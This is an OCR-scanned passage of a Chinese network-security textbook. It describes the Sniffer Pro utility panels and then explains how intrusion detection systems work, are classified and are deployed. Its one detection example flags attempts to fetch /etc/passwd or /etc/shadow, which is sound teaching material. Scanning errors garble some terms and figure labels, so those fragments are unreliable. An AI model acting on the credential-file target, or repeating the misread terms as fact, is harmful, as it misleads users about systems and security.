(2) 如 果 在 定义 的 超时 周期 内 没有 响应 ， 将 在 Ping 日 志 窗 口中 显示 消息 错误 : 请 求 超 
时 。 默 认 的 超时 周期 为 300 毫秒 ， 可 以 根据 自身 的 网 络 情况 进行 调整 ， 如 图 5-12 所 示 。 


单 击 可 查看 Ping 应 用 程序 的 版 本 号 


单 击 可 指定 要 Ping 
的 节点 的 主机 名 以 a9 由 WE wm 
及 超时 周期 一 一 一 一 | 时 


图 5-12 Ping 命令 的 面板 
2. 路 由 跟踪 
“路 由 跟踪 ”(Traceroute) 可 用 于 标识 所 有 中 间 路 由 器 的 瑟 地 址 以 及 Sniffer Pro 与 目标 
主机 之 间 的 访问 延 时 ， 指 定 目的 地 主机 的 人 P 地 址 或 DNS 名 称 以 及 超时 间隔 (默认 300 
毫秒 )。“ 路 由 跟踪 ”发 出 “ICMP 路 由 跟踪 ”数据 包 ， 链 路 上 的 路 由 器 会 返回 报告 ，“ 路 
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由 跟踪 ”会 显示 路 由 跟踪 日 志 ， 用 以 指示 PC 至 目的 地 主机 的 路 径 。 

在 路 由 跟踪 过 程 完成 之 后 ，“ 路 由 跟踪 ”将 发 出 DNS 查找 ， 并 在 路 由 跟踪 日 志 窗口 中 
显示 结果 ， 也 可 以 在 表 或 图 中 显示 该 结果 ( 单 击 路 由 跟踪 日 志 窗 口 底部 的 表 或 图 选项 卡 )， 
如 图 5-13 所 示 。 


单 击 可 查看 “路 由 跟踪 ”应 用 
单 击 可 取消 路 程序 的 版 本 号 
由 跟踪 过 程 


单 击 可 指定 目的 地 
主机 和 超时 间隔 


单 击 可 在 表 或 图 中 显示 结果 
5-13 Traceroute 命令 的 面板 
3. DNS 


“DNS 查找 ”可 用 于 查找 他 地 址 的 域名 或 者 域名 的 人 P 地 址 。“DNS 查找 ”向 DNS 
主机 发 送 查 询 ， 并 在 DNS 查找 日 志 窗 口中 显示 查询 结果 ， 如 图 5-14 所 示 。 


单 击 可 查看 “DNS 查找 ” 
应 用 程序 的 版 本 号 


让 
或 IP 地 址 


5-14 ”DNS 命令 的 面板 


4. Finger 


Finger 命令 可 用 于 显示 特定 主机 上 每 个 登录 用 户 的 信息 ， 如 图 5-15 所 示 ， 可 以 通过 输 
入 主机 名 或 人 P 地 址 来 指定 主机 。 要 查询 特定 用 户 ， 可 在 查询 字段 输入 用 户 名 ; 要 查询 所 有 


@ 
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用 户 ， 可 将 查询 字段 保留 为 空 。 


单 击 可 查看 Finger 应 用 程序 
的 版 本 号 


单 击 可 指定 目的 地 
主机 或 特定 用 户 


图 5-15 Finger 命令 的 面板 
5. Whois 


Whois 命令 可 用 于 搜索 注册 域名 、 用 户 名 或 用 户 ID 的 TCP/IP 目录 条 目 。 可 以 在 查询 
字段 中 指定 Whois 搜索 的 目标 ， 输 入 : 

(1) 域 的 名 称 、 域 。 

(2) 注册 用 户 的 名 字 。 

(3) 用 户 的 ID。 

还 可 以 在 服务 器 字段 中 指定 服务 器 ， 将 搜索 范围 限制 在 特定 的 服务 器 上 。 搜 索 结果 将 
显示 在 Whois 日 志 窗口 中 ， 如 图 5-16 所 示 。 


6. 添加 工具 


除了 所 提供 的 Sniffer Pro 标准 工具 外 ， 也 可 以 在 工具 菜单 中 添加 自己 的 工具 。 此 工具 
可 以 是 计算 机 上 当前 已 安装 或 可 以 访问 的 任何 Windows 或 DOS 可 执行 文件 。 
单 击 可 查看 Whois 应 用 
单 击 可 取消 搜索 。， 程序 的 版 本 号 


5-16 ”Whois 命令 的 面板 


要 添加 工具 ， 应 选择 工具 菜单 中 的 自 定义 工具 ， 打 开 “ 自 定义 ”对 话 框 ， 在 各 个 字段 
中 输入 所 需 信息 ， 如 图 5-17 所 示 。 


由 5 曹安 全 亡 态 与 入 佐 散 浏 


洪 


要 更 改 “ 工 具 ” 菜 
单 中 工具 的 显示 顺 
序 、 可 以 选择 某 个 
工具 并 单 击 “ 上 移 ” 
或 “下 移 ” 
指定 要 在 “工具 ” 菜 
单 中 显示 的 工具 名 称 ps 
加 


指定 正确 启动 该 工具 所 需 的 可 执行 文件 名 、 
命令 行 参数 以 及 初始 启动 目录 


图 5-17 添加 “工具 ”命令 的 面板 
5.2 入 侵 检测 系统 


随 着 网 络 安全 风险 系数 的 不 断 提高 ， 曾 经 作为 最 主要 的 安全 防范 手段 的 防火 墙 ， 已 经 
不 能 满足 人 们 对 网 络 安全 的 需求 。 作 为 对 防火 墙 极其 有 益 的 补充 ，IDS( 入 侵 检测 系统 ) 能 够 
帮助 网 络 系统 快速 发 现 网 络 攻击 , 扩展 了 系统 管理 员 的 安全 管理 能 力 (包括 安全 审计 、 监视、 
进攻 识别 和 响应 )， 提 高 了 信息 安全 基础 结构 的 完整 性 。 

IDS 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ， 它 能 在 不 影响 网 络 性 能 的 情况 下 对 网 络 
进行 监听 ， 从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 

伴随 着 计算 机 网 络 技术 和 互联 网 的 飞速 发 展 ， 网 络 攻击 和 入 侵 事件 与 日 俱 增 ， 特 别 是 
近 两 年 ， 政 府 部 门 、 军 事 机构 、 金 融 机 构 、 企 业 的 计算 机 网 络 频 站 黑客 袭击 。 攻 击 者 可 以 
从 容 地 对 那些 没有 安全 保护 的 网 络 进行 攻击 和 入 侵 ， 如 进行 拒绝 服务 攻击 、 从 事 非 授权 的 
访问 、 肆 意 窃 取 和 算 改 重要 的 数据 信息 、 安 装 后 门 监 听 程 序 以 便 随 时 获得 内 部 信息 、 传 揪 
计算 机 病毒 、 摧 毁 主 机 等 。 攻 击 和 入 侵 事 件 给 这 些 机 构 和 企业 带 来 了 巨大 的 经 济 损失 和 形 
象 的 损害 ， 甚 至 直接 威胁 到 国家 的 安全 。 


5.2.1 入 侵 检测 的 概念 与 原理 


入 侵 检测 (Intrusion Detection) 是 对 入 侵 行为 的 检测 。 它 通过 收集 和 分 析 网 络 行为 、 安 全 
日 志 、 审 计数 据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 ， 检 查 
网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 作为 一 种 积极 主动 
的 安全 防护 技术 ， 提 供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ， 在 网 络 系统 受到 危 
害 之 前 拦截 和 响应 入 侵 。 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ， 在 不 影响 网 络 性 能 
的 情况 下 能 对 网 络 进行 监测 。 入 侵 检测 通过 执行 以 下 任务 来 实现 : 监视 、 分 析 用 户 及 系统 
活动 ， 系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 士 报警 ， 异常 行 
为 模式 的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ; 操作 系统 的 审计 跟踪 管理 ， 并 识 
别 用 户 违反 安全 策略 的 行为 。 
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1. 入 侵 检测 系统 的 作用 


防火 墙 在 Intemet 网 络 安全 中 起 着 大 门 警卫 的 作用 ， 对 进出 的 数据 依照 预先 设 定 的 规 
则 进行 匹配 ， 符 合 规则 的 就 予以 放行 ， 是 网 络 安全 的 第 一 道 闸 门 。 但 防火 墙 的 功能 也 有 局 
限 性 ， 防 火 墙 只 能 对 进出 网 络 的 数据 进行 分 析 ， 对 网 络 内 部 发 生 的 事件 完全 无 能 为 力 。 

同时 ， 由 于 防火 墙 处 于 网 关 的 位 置 ， 不 可 能 对 进出 攻击 作 太 多 判断 ， 否 则 会 严重 影响 
网 络 性 能 。 如 果 把 防火 墙 比 作 大 门 警卫 的 话 ， 入 侵 检测 就 是 网 络 中 不 间断 的 摄像 机 ， 入 侵 
检测 通过 旁 路 监听 的 方式 不 间断 地 收集 网 络 数据 ， 对 网 络 的 运行 和 性 能 无 任何 影响 ， 同 时 
判断 其 中 是 否 含有 攻击 的 企图 ， 并 通过 各 种 手段 向 管理 员 报 警 。 

入 侵 检测 系统 IDS 是 主动 保护 自己 免 受 攻击 的 一 种 网 络 安全 技术 。IDS 对 网 络 或 系统 
上 的 可 疑 行为 做 出 相应 的 反应 ， 及 时 切断 入 侵 源 ， 保 护 现场 并 通过 各 种 途径 通知 网 络 管理 
员 ， 增 强 系 统 安全 的 保障 。 


2. 入 侵 检测 系统 的 工作 流程 


入 侵 检测 系统 由 数据 收集 、 数据 提取 、 数据 分 析 和 事件 处 理 等 几 个 部 分 组 成 , 如 图 5-18 
所 示 。 

1) ”数据 收集 

入 侵 检测 的 第 一 步 是 数据 收集 ， 内 容 包 括 系统 、 网 络 运 行 、 数 据 及 用 户 活动 的 状态 和 
行为 ， 而 且 ， 需 要 在 计算 机 网 络 系统 中 的 若干 不 同 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 数 据 。 
入 侵 检测 很 大 程度 上 依赖 于 收集 数据 的 准确 性 与 可 靠 性 ， 因 此 ， 必 须 使 用 精确 的 软件 来 报 
告 这 些 信息 。 数 据 的 收集 主要 来 源 有 系统 和 网 络 日 志文 件 、 目 录 和 文件 不 期 望 的 改变 、 程 
序 不 期 望 的 行为 以 及 物理 形式 的 入 侵 数据 等 。 


收 | 数据 让 提 | 数据 3 分 | 事件 ”处 | 事件 
集 取 析 理 


图 5-18 入侵 检 测 系 统 的 工作 流程 


2) ”数据 提取 

从 收集 到 的 数据 中 提取 有 用 的 数据 ， 以 供 数 据 分 析 之 用 。 

3) ”数据 分 析 

对 收集 到 的 有 关系 统 、 网 络 运行 、 数 据 及 用 户 活动 的 状态 和 行为 等 数据 通过 三 种 技术 
手段 进行 分 析 : 模块 匹配 、 统 计 分 析 和 完整 性 分 析 。 

人 ”结果 处 理 

记录 入 侵 事件 ， 同 时 采取 报警 、 中 断 连 接 等 措施 。 


5.2.2 ”入 侵 检测 系统 的 构成 与 功能 


入 侵 检测 系统 通过 对 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 进行 分 析 ， 
从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 系统 执行 的 
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的 活动 模式 ， 向 相关 人 士 报警 ;统计 分 析 异 常 行为 模式 ; 评估 重要 系统 和 数据 文件 的 完整 
性 ; 审计 、 跟 踪 管 理 操作 系统 ， 识 别 用 户 违反 安全 策略 的 行为 。 


1. 入 侵 检测 系统 的 构成 


入 侵 检测 系统 主要 包括 三 部 分 : 探测 器 、 数 据 采 集 器 和 控制 台 。 探 测 器 是 一 个 黑匣子 ， 
运行 时 没有 用 户 界面 ;数据 采集 器 是 和 管理 控制 台 位 于 同一 台 机 器 上 的 服务 ， 它 负责 接收 
探测 器 发 送 的 数据 包 ， 解 析 转 发 给 管理 控制 台 ， 管 理 控制 台面 向 用 户 ， 是 一 个 图 形 界面 控 
制 终端 。 探 测 器 与 数据 采集 器 和 控制 终端 的 通信 建立 在 认证 和 加 密 的 基础 上 。 

网 络 探测 器 负责 监视 网 络 上 所 有 类 型 的 数据 包 ， 实 时 检测 恶意 的 攻击 行为 特征 ， 同 时 
将 有 关 告 警 信息 发 送 给 数据 采集 器 ， 由 数据 采集 器 发 送 给 控制 台 或 发 送 E-mail 给 管理 员 ， 
控制 台 接收 到 告警 信息 ， 显 示 告 警 信息 (文字 )、 发 告警 声音 和 NT 日 志 等 ， 以 提醒 有 关 管 理 
人 员 查 看 和 根据 情况 采取 相应 的 措施 。 告 警 信息 包括 : 连接 双方 的 源 他 地 址 、 目 的 下 地 
址 ， 源 、 目 的 端口 以 及 简单 的 告警 信息 说 明 等 。 

数据 采集 器 在 转发 告警 信息 之 前 ， 首 先 把 告警 信息 保存 到 数据 库 中 ， 控 制 台 提供 在 当 
前 告警 信息 或 历史 日 志 记录 中 简单 的 查询 和 删除 等 功能 。 


2. 入 侵 检测 系统 (IDS) 的 主要 功能 


(1) 识别 黑客 常用 的 入 侵 与 攻击 手段 。 入 侵 检 测 技术 通过 分 析 各 种 攻击 的 特征 ， 可 以 
全 面 快速 地 识别 探测 攻击 、 拒 绝 服务 攻击 、 缓 冲 区 浇 出 攻击 等 各 种 常用 攻击 手段 ， 并 做 出 
相应 的 措施 。 

(2) 监控 网 络 异常 通信 。IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ， 保 证 网 络 
通信 的 合法 性 。 任 何不 符合 网 络 安全 策略 的 网 络 数据 都 会 被 BS 侦 测 到 并 警告。 

(3) 鉴别 对 系统 漏洞 及 后 门 的 利用 。IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ， 
通过 对 网 络 数据 包 连 接 的 方式 、 连 接 端 口 以 及 连接 中 特定 的 内 容 等 特征 分 析 ， 可 以 有 效 地 
发 现 网 络 通信 中 针对 系统 漏洞 进行 的 非法 行为 。 

(4) 完善 网 络 安全 管理 。IDS 通过 对 攻击 或 入 侵 的 检测 及 反应 ， 可 以 有 效 地 发 现 和 防 
止 大 部 分 的 网 络 犯罪 行为 , 给 网 络 安全 管理 提供 了 一 个 集中 、 方便 、 有 效 的 工具 。 使 用 IDS 
系统 的 监测 、 统 计 分 析 、 报 表 功 能 ， 可 以 进一步 完善 网 络 管理 。 

对 一 个 成 功 的 入 侵 检测 系统 来 讲 ， 它 不 但 可 以 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程 
序 、 文 件 和 硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 指南 。 更 为 重要 的 一 
点 是 ， 它 应 该 管理 、 配 置 简单 ， 从 而 使 非 专业 人 员 非 常 容易 地 获得 网 络 安全 。 入 侵 检测 的 
规模 还 应 根据 网 络 威胁 、 系 统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 攻击 后 ， 
会 及 时 做 出 响应 ， 包 括 切断 网 络 连接 、 记 录 事 件 和 报警 等 。 


5.2.3 ”入 侵 检测 系统 的 分 类 


1. 根据 其 采用 的 技术 可 以 分 为 异常 检测 和 特征 检测 
(1) 异常 检测 : 异常 检测 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 ， 建 立正 常 活动 
的 “活动 简 档 ”， 当 前 主体 的 活动 违反 其 统计 规律 时 ， 就 认为 可 能 是 “入 侵 ” 行 为 。 通 过 
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检测 系统 的 行为 或 使 用 情况 的 变化 来 完成 。 

(2) 特征 检测 : 特征 检测 假设 入 侵 者 的 活动 可 以 用 一 种 模式 来 表示 ， 然 后 将 观察 对 象 
与 之 进行 比较 ， 判 别 是 否 符合 这 些 模式 。 

G) 协议 分 析 : 利用 网 络 协议 的 高 度 规则 性 快速 探测 攻击 的 存在 。 


2. 根据 其 监测 的 对 象 


根据 其 监测 的 对 象 是 主机 还 是 网 络 可 以 分 为 三 类 ， 基 于 主机 型 (host based) 入 侵 检测 系 
统 、 基 于 网 络 型 (network based) 入 侵 检测 系统 和 基于 代理 型 (agent based) 入 侵 检测 系统 。 

1) “基于 主机 的 入 侵 检测 系统 

基于 主机 的 入 侵 检测 系统 通常 以 系统 日 志 、 应 用 程序 日 志 等 审计 记录 文件 作为 数据 源 。 
它 是 通过 比较 这 些 审计 记录 文件 的 记录 与 攻击 签名 (attack signature) 以 发 现 它们 是 否 匹 配 。 
如 果 匹 配 , 检测 系统 向 系统 管理 员 发 出 入 侵 报警 并 采取 相应 的 行动 。 基 于 主机 的 IDS 可 以 
精确 地 判断 入 侵 事件 ， 并 可 对 入 侵 事件 及 时 做 出 反应 。 它 还 可 针对 不 同 操作 系统 的 特点 判 
断 应 用 层 的 入 侵 事 件 。 基 于 主机 的 IDS 有 着 明显 的 优点 。 

基于 主机 的 入 侵 检 测 系统 对 系统 内 在 的 结构 没有 任何 约束 ， 同 时 利用 操作 系统 本 身 提 
供 的 功能 ， 并 结合 异常 检测 分 析 ， 更 能 准确 地 报告 攻击 行为 。 

基于 主机 的 入 侵 检测 系统 存在 的 不 足 之 处 在 于 , 会 占用 主机 系统 资源 , 增加 系统 负 蓓 ， 
而 且 针对 不 同 的 操作 平台 必须 开发 出 不 同 的 程序 ， 另 外 所 需 配 置 的 数量 众多 。 

2) “基于 网 络 的 入 侵 检 测 系统 

基于 网 络 的 入 侵 检测 系统 把 原始 的 网 络 数据 包 作 为 数据 源 ， 利 用 网 络 适 配器 来 实时 地 
监视 并 分 析 通 过 网 络 进行 传输 的 所 有 通信 业务 。 它 用 攻击 识别 模块 进行 攻击 签名 识别 ， 其 
方法 有 模式 、 表 达 式 或 字 节 码 匹 配 、 频 率 或 阐 值 比较 、 次 要 事件 的 相关 性 处 理 、 统 计 异 常 
检测 等 。 一 旦 检测 到 攻击 ，IDS 的 响应 模块 通过 通知 、 报 警 以 及 中 断 连接 等 方式 来 对 攻击 
行为 做 出 反应 。 然 而 它 只 能 监视 通过 本 网 段 的 活动 ， 并 且 精 确 度 较 差 ， 在 交换 网 络 环境 中 
难于 配置 ， 防 欺骗 的 能 力也 比较 差 。 其 优势 如 下 。 

(1) 成 本 低 。 

(2) 攻击 者 转移 证 据 困 难 。 

(3) 实时 检测 和 响应 。 

(4) 能 够 检测 到 未 成 功 的 攻击 企图 。 

(5) 与 操作 系统 无 关 ， 即 基于 网 络 的 IDS 并 不 依赖 主机 的 操作 系统 作为 检测 资源 。 

3) ”基于 代理 的 入 侵 检 测 系统 

基于 代理 的 入 侵 检 测 系统 用 于 监视 大 型 网 络 系统 。 随 着 网 络 系统 的 复杂 化 和 大 型 化 ， 
系统 弱点 趋 于 分 布 式 ， 而 且 攻 击 行为 也 表现 为 相互 协作 式 特点 ， 所 以 不 同 的 IDS 之 间 需 要 
共享 信息 ， 协 同 检测 。 整 个 系统 可 以 由 一 个 中 央 监 视 器 和 多 个 代理 组 成 。 中 央 监 视 器 负责 
对 整个 监视 系统 的 管理 ， 它 应 该 处 于 一 个 相对 安全 的 地 方 。 代 理 则 被 安放 在 被 监视 的 主机 
上 (如 服务 器 、 交 换 机 和 路 由 器 等 )。 代 理 负 责 对 某 一 主机 的 活动 进行 监视 ， 如 收集 主机 运 
行 时 的 审计 数据 和 操作 系统 的 数据 信息 ， 然 后 将 这 些 数据 传送 到 中 央 监 视 器 。 代 理 也 可 以 
接受 中 央 监 控 器 的 指令 ， 这 种 系统 的 优点 是 可 以 对 大 型 分 布 式 网 络 进行 检测 。 
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3. 根据 工作 方式 分 为 离线 检测 系统 与 在 线 检测 系统 


(1) 离线 检测 系统 : 离线 检测 系统 是 非 实时 工作 的 系统 ， 它 在 事后 分 析 审 计 事件 ， 从 
中 检查 入 侵 活 动 。 事 后 入 侵 检测 由 网 络 管理 人 员 进 行 ， 他 们 具有 网 络 安全 的 专业 知识 ， 根 
据 计算 机 系统 对 用 户 操作 所 做 的 历史 审计 记录 判断 是 否 存在 入 侵 行为 , 如 果 有 就 断 开 连接 ， 
并 记录 入 侵 证 据 和 进行 数据 恢复 。 事 后 入 侵 检 测 是 管理 员 定期 或 不 定期 进行 的 ， 不 具有 实 
时 性 。 

(2) 在 线 检测 系统 : 在线 检测 系统 是 实时 联机 的 检测 系统 ， 它 包含 对 实时 网 络 数据 包 
分 析 ， 实 时 主机 审计 分 析 。 其 工作 过 程 是 实时 入 侵 检 测 在 网 络 连接 过 程 中 进行 ， 系 统 根 据 
用 户 的 历史 行为 模型 、 存 储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当前 的 操作 进 
行 判 断 , 一 旦 发 现 入 侵 迹 象 就 立即 断 开 入 侵 者 与 主机 的 连接 ,并 搜集 证 据 和 实施 数据 恢复 。 
这 个 检测 过 程 是 不 断 循环 进行 的 。 


5.2.4 ”入 侵 检测 系统 的 部 署 


在 防火 墙 的 基础 之 上 部 署 入 侵 检测 系统 ， 应 首先 考虑 目前 的 网 络 规模 和 范围 以 及 需要 
保护 的 数据 和 基础 设施 等 ， 由 于 IDS 只 是 一 种 安全 硬件 ， 而 且 由 于 IDS 在 行为 检测 过 程 中 
可 能 会 占用 比较 多 的 资源 ， 这 对 于 一 个 极 小 的 网 络 来 说 会 成 为 很 大 的 负担 ， 甚 至 会 影响 网 
络 的 使 用 性 能 。 用 户 只 有 根据 自身 的 需求 进行 评估 后 ， 才 可 以 对 相关 的 IDS 或 IPS 进行 评 
测 考证 ， 随 后 才能 讨论 IDS 如 何 融入 现 有 的 安全 策略 中 。 


1. 定义 IDS 的 目标 


不 同 的 组 网 应 用 可 能 使 用 不 同 的 规则 配置 ， 所 以 用 户 在 配置 入 侵 检测 系统 前 应 先 明确 
自己 的 目标 ， 建 议 从 如 下 几 个 方面 进行 考虑 。 

1) ”网 络 拓扑 需求 

(1) 分 析 网 络 拓扑 结构 ， 需 要 监控 什么 样 的 网 络 ， 是 用 什么 物理 链接 的 ， 是 交换 机 还 
是 集线器 。 

(2) 是 否 需要 同时 监控 多 个 网 络 ， 多 个 子 网 是 交换 机 连接 还 是 通过 路 由 器 /网 关连 接 。 

(3) 选择 网 络 入 口 点 ， 需 要 把 网 络 监视 主机 放 在 什么 位 置 。 

(4) 分 析 关 键 网 络 组 件 、 网 络 大 小 和 复杂 度 。 

2) ”安全 策略 需求 

(1) 是 否 限制 Telnet、SSH、HTTP、HTTPS 等 服务 管理 访问 。 

(2) Telnet 登录 是 否 需 要 登录 密码 。 

(3) 安全 的 Shell(SSH) 的 认证 机 制 是 否 需要 加 强 。 

(4) 是 否 允 许 从 非 管理 口 (如 以 太 网 口 ， 而 不 是 Console 端口 ) 进 行 设备 管理 。 

3) IDS 的 管理 需求 

(1) 有 哪些 接口 需要 配置 管理 服务 。 

(2) 是 否 启用 Telnet 进行 设备 管理 。 

(3) 是 否 启 用 SSH 进行 设备 管理 。 

(4) 是 否 启用 HTTP 进行 设备 管理 。 
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(5) 是 否 启用 HTTPS 进行 设备 管理 。 
(6) 是 否 需 要 和 其 他 设备 (例如 防火 墙 ) 进 行 联动 。 


2. 选择 监视 内 容 


1) ”选择 监视 的 网 络 区 域 

在 小 型 网 络 结构 中 ， 如 果 内 部 网 络 是 可 以 信任 的 ， 那 么 只 需要 监控 内 部 网 络 和 外 部 网 
络 的 边界 流量 。 

2) 选择 监视 的 数据 包 的 类 型 

入 侵 检测 系统 可 事先 对 攻击 报 文 进行 协议 分 析 ， 从 中 提取 瑟 、TCP、UDP、ICMP 协 
议 头 信息 和 应 用 载荷 数据 的 特征 ， 并 且 构建 特征 匹配 规则 ， 然 后 根据 需求 使 用 特征 匹配 规 
则 对 侦 听 到 的 网 络 流量 (包括 全 包 、TCP 包 、UDP 包 和 ICMP 包 ) 进 行 精确 检测 ， 若 规则 命 
中 ， 表 明 该 网 络 流量 中 包含 入 侵 。 

3) ”根据 网 络 数据 包 的 内 容 进 行 检测 

利用 字符 串 模 式 匹配 技术 对 网 络 数据 包 的 内 容 进行 匹配 ， 来 检测 多 种 方式 的 攻击 和 探 
测 ， 如 缓冲 区 溢出 、CGI 攻击 、SMB 检测 、 操 作 系统 类 型 探测 等 。 例 如 ， 当 有 用 户 企图 下 
载 Unix/Linux 系统 中 的 /etc/passwd 或 /etc/shadow 文件 时 , IDS 也 会 给 出 警报 , 这 是 因为 IDS 
捕捉 到 的 数据 包 的 内 容 中 含有 特征 字符 串 /etc/passwd 或 /etc/shadow。 

一 般 来 说 ， 不 同 的 入 侵 检测 系统 采用 不 同 的 方法 来 监视 网 络 数据 包 的 内 容 ， 例 如 可 以 
采用 先 根据 网 络 协议 来 选择 入 侵 特 征 规 则 进行 检测 ， 然 后 再 根据 此 协议 数据 包 中 的 字符 特 
征 进行 检测 。 

3. 部 署 IDS 


1) ”只 检测 内 部 网 络 和 外 部 网 络 边界 流量 的 IDS 系统 的 部 署 

在 小 型 网 络 结构 中 ， 如 果 内 部 网 络 是 可 以 信任 的 ， 那 么 只 需要 监控 内 部 网 络 和 外 部 网 
络 的 边界 流量 。 这 种 情况 下 ， 入 侵 检测 系统 部 署 在 出 口 路 由 器 或 防火 墙 的 后 面 ， 用 来 监控 
网 络 入 口 处 所 有 流入 和 流出 网 络 的 流量 , 网 络 拓扑 结构 可 按照 如 图 5-19 所 示 的 方式 进行 部 署 。 

在 图 5-19 中 ，IDS 被 部 署 在 内 部 网 络 与 Intemet 的 出 口 处 ，IDS 设备 的 监听 口 连接 到 
了 内 部 网 络 出 口 处 的 交换 机 (Switch) 镜 像 接 口上 ， 从 而 可 以 捕获 到 交换 机 镜像 接口 的 网 络 
流量 。 

管理 员 可 以 通过 命令 行 方式 (Console、Telnet 或 SSH) 或 Web 方式 (HTTP 或 HTTPS) 远 
程 登录 到 IDS 管理 接口 并 对 设备 进行 配置 管理 。 

如 图 5-19 所 示 的 部 署 方式 不 仅 方便 了 用 户 的 使 用 和 配置 ， 也 节约 了 投资 成 本 ,适合 中 
小 规模 企业 的 网 络 安全 应 用 。 

2) ”集中 监控 多 个 子 网 流量 

在 这 种 组 网 情况 下 ， 内 部 局 域 网 中 划分 了 多 个 不 同 职能 的 子 网 ， 有 些 子 网 访问 某 些 子 
网 资源 并 希望 受到 监控 和 保护 。 

(1) 需要 对 关键 子 网 LAN1 的 流量 进行 监控 。 

(2) LAN2 子 网 放置 了 各 种 服务 器 ， 因 此 对 LAN2 的 所 有 流量 也 需要 进行 监控 。 

(3) 网 络 管理 员 要 能 够 集中 监控 网 络 的 流量 和 异常 情况 。 
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图 5-19 ”监控 网 络 边界 流量 的 IDS 系统 的 拓扑 结构 


在 这 种 情况 下 ， 含 IDS 的 网 络 拓扑 如 图 5-20 所 示 。 

网 络 管理 员 可 以 通过 安全 管理 平台 对 全 网 的 IDS 设备 进行 统一 的 配置 管理 、 策 略 部 署 
和 安全 事件 监控 ， 还 可 以 利用 安全 管理 平台 提供 的 多 种 智能 分 析 和 管理 手段 对 收集 到 的 网 
络 安全 事件 信息 进行 处 理 ， 并 依据 处 理 结果 调整 安全 策略 和 防护 手段 ， 从 而 提高 网 络 安全 
的 整体 水 平 。 


局 域 网 1 局 域 网 2 有 


DS 管理 主机 


EE) 
5-20 ”集中 监控 多 个 子 网 流量 的 IDS 拓扑 结构 
5.2.5 “入 侵 检测 系统 的 模型 
入 侵 检测 系统 的 模型 多 种 多 样 ， 根 据 不 同 的 检测 模型 ， 所 要 考虑 的 设置 要 点 也 有 所 不 
总 的 来 说 分 为 以 下 几 种 方式 。 
1. 异常 检测 模型 


1) 异常 检测 模型 的 基本 原理 
异常 检测 ,也 被 称 为 基于 行为 的 检测 。 其 基本 前 提 是 假定 所 有 的 入 侵 行为 都 是 异常 的 。 


同 
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其 基本 原理 是 ， 首 先 建立 系统 或 用 户 的 “正常 ”行为 特征 轮廓 ， 通 过 比较 当前 的 系统 或 用 
户 的 行为 是 否 偏离 正常 的 行为 特征 轮廓 来 判断 是 否 发 生 了 入 侵 ， 而 不 是 依赖 于 具体 行为 是 
否 出 现 来 进行 检测 的 。 从 这 个 意义 上 来 讲 ， 异 常 检 测 是 一 种 间接 的 方法 。 

2) 异常 检测 的 关键 技术 

(1) 特征 量 的 选择 。 

异常 检测 首先 是 要 建立 系统 或 用 户 的 “正常 ”行为 特征 轮廓 ， 这 就 要 求 在 建立 正常 模 
型 时 ， 选 取 的 特征 量 既 要 能 准确 地 体现 系统 或 用 户 的 行为 特征 ， 又 能 使 模型 最 优化 ， 即 以 
最 少 的 特征 量 就 能 涵盖 系统 或 用 户 的 行为 特征 。 例如 : 可 以 检测 磁盘 的 转速 是 否 正常 ; CPU 
是 否 无 故 超频 等 异常 现象 。 

(2) 参考 闵 值 的 选 定 。 

因为 在 实际 的 网 络 环境 下 ， 入 侵 行为 和 异常 行为 往往 不 是 一 对 一 的 等 价 关 系 ， 经 常 发 
生 这 样 的 异常 情况 ， 如 某 一 行为 是 异常 行为 ， 而 它 并 不 是 入 侵 行 为 ， 同 样 存在 某 一 行为 是 
入 侵 行为 ， 而 它 却 并 不 是 异常 行为 的 情况 。 这 样 就 会 导致 检测 结果 虚 警 (false positives) 和 漏 
警 (false negatives) 的 产生 。 由 于 异常 检测 是 先 建立 正常 的 特征 轮廓 作为 比较 的 参考 基准 , 这 
个 参考 基准 即 参考 阔 值 的 选 定 是 非常 关键 的 ， 阔 值 定 得 过 大 ， 漏 警 率 会 很 高 ， 阔 值 定 得 过 
小 ， 则 虚 警 率 就 会 提高 。 合 适 的 参考 阔 值 的 选 定 是 影响 这 一 检测 方法 准确 率 的 至 关 重 要 的 
因素 。 

从 异常 检测 的 原理 可 以 看 出 ， 该 方法 的 技术 难点 在 于 “正常 ”行为 特征 轮廓 的 确定 、 
特征 量 的 选取 、 特 征 轮 廓 的 更 新 。 由 于 这 几 个 因素 的 制约 ， 异 常 检测 的 虚 警 率 很 高 ， 但 对 
于 未 知 的 入 侵 行为 的 检测 非 党 有效。 此外， 由 于 需要 实时 地 建立 和 更 新 系统 或 用 户 的 特征 
轮廓 ， 这 样 所 需 的 计算 量 很 大 ， 对 系统 的 处 理性 能 要 求 会 很 高 。 

3) 异常 检测 模型 的 实现 方法 

异常 检测 模型 常用 的 实现 方法 有 基于 统计 分 析 的 异常 检测 方法 、 基 于 特征 选择 的 异常 
检测 方法 、 基 于 贝 叶 斯 (Bayesian) 推 理 的 异常 检测 方法 、 基 于 贝 叶 斯 网 络 的 异常 检测 方法 、 
基于 模式 预测 的 异常 检测 方法 、 基 于 神经 网 络 的 异常 检测 方法 、 基 于 贝 叶 斯 聚 类 的 异常 检 
测 方法 、 基 于 机 器 自学 习 系统 的 异常 检测 方法 和 基于 数据 采掘 技术 的 异常 检测 方法 等 。 

(1) 基于 统计 分 析 的 异常 检测 方法 。 

